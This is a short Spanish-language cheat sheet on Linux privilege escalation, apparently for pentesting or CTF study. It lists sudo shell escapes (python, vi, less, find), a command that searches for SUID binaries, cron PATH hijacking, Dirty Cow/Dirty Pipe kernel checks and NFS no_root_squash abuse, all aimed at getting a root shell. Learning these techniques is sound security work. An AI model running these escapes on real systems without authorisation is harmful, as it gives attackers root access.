Salta el contingut

Linux Privilege Escalation

[!danger] GOAL: ROOT Usa LinPEAS siempre para detectar estas rutas.

1. Sudo Rights

Comprueba qué puedes ejecutar como otro usuario (o root).

sudo -l
Si ves (ALL) NOPASSWD: /usr/bin/python, ve a GTFOBins.

Common Sudo Escapes

  • Python: sudo python -c 'import os; os.system("/bin/sh")'
  • Vi/Vim: :!/bin/sh
  • Less/More: !/bin/sh
  • Find: sudo find . -exec /bin/sh \;

2. SUID Binaries

Archivos que se ejecutan con los permisos del dueño (root).

# Buscar SUIDs
find / -perm -u=s -type f 2>/dev/null
Busca binarios "raros" o estándar exploitables en GTFOBins. Ej: Si systemctl tiene SUID, puedes crear un servicio malicioso.


3. Cron Jobs

Tareas programadas que corren como root. * Mira /etc/crontab. * Busca scripts que puedas editar o paths relativos. * Path Hijacking: Si el script llama a tar sin ruta absoluta (/usr/bin/tar) y tú puedes escribir en una carpeta del $PATH, crea tu propio tar malicioso.


4. Kernel Exploits (Dirty Cow / Dirty Pipe)

Solo si la máquina es vieja y nada más funciona.

uname -a
# Busca versiones vulnerables:
# Linux Kernel < 5.8 -> Dirty Pipe
# Linux Kernel < 3.x -> Dirty Cow


5. NFS Root Squashing

Si ves /etc/exports con no_root_squash. 1. Desde tu máquina atacante, monta el share. 2. Copia un binario suid.c que ejecute bash. 3. Compílalo y dale permisos SUID (chmod +s) desde tu máquina atacante. 4. Ejecútalo en la víctima -> Root shell.